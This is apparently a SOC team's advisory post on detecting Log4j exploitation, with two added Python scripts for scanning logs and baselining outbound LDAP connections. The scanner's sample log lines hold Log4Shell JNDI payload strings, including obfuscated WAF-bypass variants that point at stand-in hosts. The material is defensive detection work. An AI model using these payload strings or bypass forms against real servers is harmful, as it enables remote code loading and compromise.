- eSOC Team
Immediate Actions to Protect Against Exploitation of the Log4j Vulnerability
CSA has just released an update to its recommendations on protecting against the Log4j vulnerability. Please click on the link to read the full advisory.
One of the recommendations is to "Deploy Protective Network Monitoring and Review System Logs".
Users who have Web Application Firewalls (WAFs) should ensure applicable rules are applied to protect against the vulnerability. These could include blocking URLs containing exploit strings like "jndi:ldap". However, a WAF should not be relied on as the only control, and users should also adopt other measures to defend their network, since certain variants of the string may bypass WAF rules.
The attack may involve JNDI remote class loading, in which the vulnerable server downloads a malicious .class file from a remote host. Users who deploy or maintain Java applications can look out for unfamiliar Java .class files within the CLASSPATH. They can also search their Log4j log files for JNDI exploit strings like "jndi:". The presence of such indicators may indicate an attack.
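As an added example (not part of this advisory or CSA's material), the following Python log scanner implements the log review described above. It searches web-server log lines for the JNDI lookup string and, because the advisory notes that variants of the string can slip past a literal match, first URL-decodes each line and collapses nested lookups before matching. The log lines are constructed, and the nesting forms it unwraps are an assumption about which variants are in scope; extend the patterns to match what your own logs show.

```python
import re
from urllib.parse import unquote

# Constructed sample web-server log lines (not real captures). The User-Agent
# field carries the plain lookup string the advisory cites, plus two nested
# variants of the kind that a rule matching only the literal "jndi:ldap" misses.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [11/Dec/2021:02:14:07 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:02:15:33 +0000] "GET /login HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [11/Dec/2021:02:16:01 +0000] "GET /api HTTP/1.1" 404 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.10:1389/b}"',
    '10.0.0.12 - - [11/Dec/2021:02:17:45 +0000] "GET /health HTTP/1.1" 200 "-" "%24%7B%24%7Benv%3ANOPE%3A-j%7Dndi%3Armi%3A%2F%2F203.0.113.11%3A1099%2Fc%7D"',
    '10.0.0.3 - - [11/Dec/2021:02:18:10 +0000] "GET /docs HTTP/1.1" 200 "-" "curl/7.68.0"',
]

# Assumed variant forms to unwrap (innermost first, since the character class
# excludes braces): case-changing lookups and lookups with a ":-default" value.
CASE_LOOKUP = re.compile(r'\$\{(?:lower|upper):([^{}]*)\}', re.IGNORECASE)
DEFAULT_LOOKUP = re.compile(r'\$\{[^{}:]*:[^{}]*?:-([^{}]*)\}')

# After normalisation the lookup reads ${jndi:<scheme>://<host[:port]>...
JNDI_LOOKUP = re.compile(r'\$\{jndi:([a-z]+)://([^/}\s"]+)')


def normalize(text):
    """URL-decode the line and collapse nested lookups until nothing changes,
    so obfuscated forms reduce to the canonical lower-case ${jndi:...} string."""
    text = unquote(text)
    prev = None
    while prev != text:
        prev = text
        text = CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text.lower()


def scan_line(line):
    """Return scheme, target and the raw line for a JNDI lookup, else None."""
    m = JNDI_LOOKUP.search(normalize(line))
    if m is None:
        return None
    return {"scheme": m.group(1), "target": m.group(2), "raw": line}


def scan_log(lines):
    """Scan an iterable of log lines and keep only the hits."""
    return [hit for hit in map(scan_line, lines) if hit is not None]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG_LINES):
        print(f"JNDI lookup via {hit['scheme']} to {hit['target']}: {hit['raw']}")
```

The `target` field of each hit (host and port of the lookup) is the value to carry into the network log review: it is the destination the server would have contacted if the lookup resolved.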
Users can also search for outgoing LDAP connections to Internet destinations not seen before 1 December 2021. If any are detected, users should search the initiating host for the presence of Log4j. If DNS queries are logged, queries by that host should be reviewed to check for any possible exfiltration over the DNS protocol.
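An added example, not taken from the advisory, of the baselining just described, run over a constructed connection log. It assumes a CSV export with timestamp, src, dst, dport and proto columns (an assumption about your firewall or flow-log format), treats the standard LDAP ports 389 and 636 as LDAP traffic, and approximates "Internet destinations" as anything outside the RFC 1918, loopback and link-local ranges; adjust all three to your environment.

```python
import csv
import ipaddress
from datetime import datetime, timezone
from io import StringIO

# Date from the advisory: LDAP destinations first contacted on or after it are "new".
BASELINE_CUTOFF = datetime(2021, 12, 1, tzinfo=timezone.utc)

# Assumption: standard LDAP ports only. A listener on a non-standard port is
# not caught by port matching; use protocol identification from your sensor
# where it is available.
LDAP_PORTS = {389, 636}

# Assumption: everything outside these ranges counts as an Internet destination.
INTERNAL_NETWORKS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16",
)]

# Constructed connection-log export (not real data). Row by row:
# 1. pre-cutoff LDAPS to an external directory service: enters the baseline
# 2. post-cutoff LDAP to a never-seen Internet host: flagged
# 3. post-cutoff LDAPS to the baselined host: not flagged
# 4. LDAP to an internal domain controller: ignored
# 5. post-cutoff LDAP to a second never-seen Internet host: flagged
# 6. post-cutoff HTTPS, not LDAP: ignored
SAMPLE_CONNECTION_LOG = """\
timestamp,src,dst,dport,proto
2021-11-20T09:12:00Z,10.0.0.5,198.51.100.7,636,tcp
2021-12-10T03:14:07Z,10.0.0.9,203.0.113.10,389,tcp
2021-12-10T03:15:00Z,10.0.0.5,198.51.100.7,636,tcp
2021-12-10T03:16:30Z,10.0.0.9,10.0.0.20,389,tcp
2021-12-10T03:17:00Z,10.0.0.12,203.0.113.11,389,tcp
2021-12-10T03:18:00Z,10.0.0.3,203.0.113.50,443,tcp
"""


def parse_records(text):
    """Yield one dict per CSV row with a typed timestamp, addresses and port."""
    for row in csv.DictReader(StringIO(text)):
        yield {
            "ts": datetime.fromisoformat(row["timestamp"].replace("Z", "+00:00")),
            "src": row["src"],
            "dst": ipaddress.ip_address(row["dst"]),
            "dport": int(row["dport"]),
        }


def is_internet(addr):
    """True when the address falls outside the assumed internal ranges."""
    return not any(addr in net for net in INTERNAL_NETWORKS)


def is_outbound_ldap(rec):
    return rec["dport"] in LDAP_PORTS and is_internet(rec["dst"])


def find_new_ldap_destinations(text, cutoff=BASELINE_CUTOFF):
    """Return post-cutoff outbound LDAP connections whose destination was
    never contacted over LDAP before the cutoff."""
    records = [r for r in parse_records(text) if is_outbound_ldap(r)]
    baseline = {r["dst"] for r in records if r["ts"] < cutoff}
    return [r for r in records if r["ts"] >= cutoff and r["dst"] not in baseline]


def hosts_to_check(flagged):
    """Group flagged connections by initiating host: these are the hosts to
    search for Log4j and whose DNS queries to review."""
    by_host = {}
    for r in flagged:
        by_host.setdefault(r["src"], set()).add(str(r["dst"]))
    return by_host


if __name__ == "__main__":
    flagged = find_new_ldap_destinations(SAMPLE_CONNECTION_LOG)
    for host, dsts in hosts_to_check(flagged).items():
        print(f"{host}: new outbound LDAP to {', '.join(sorted(dsts))} -> check host for Log4j")
```

The baseline is built only from LDAP connections that predate the cutoff, so a destination that was legitimate before 1 December 2021 (for example a hosted directory service) is not flagged, while the same port to a never-seen host is. The output groups hits by source host, which is the unit the advisory tells you to investigate next.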
Please contact any of our Client Managers if you need urgent assistance.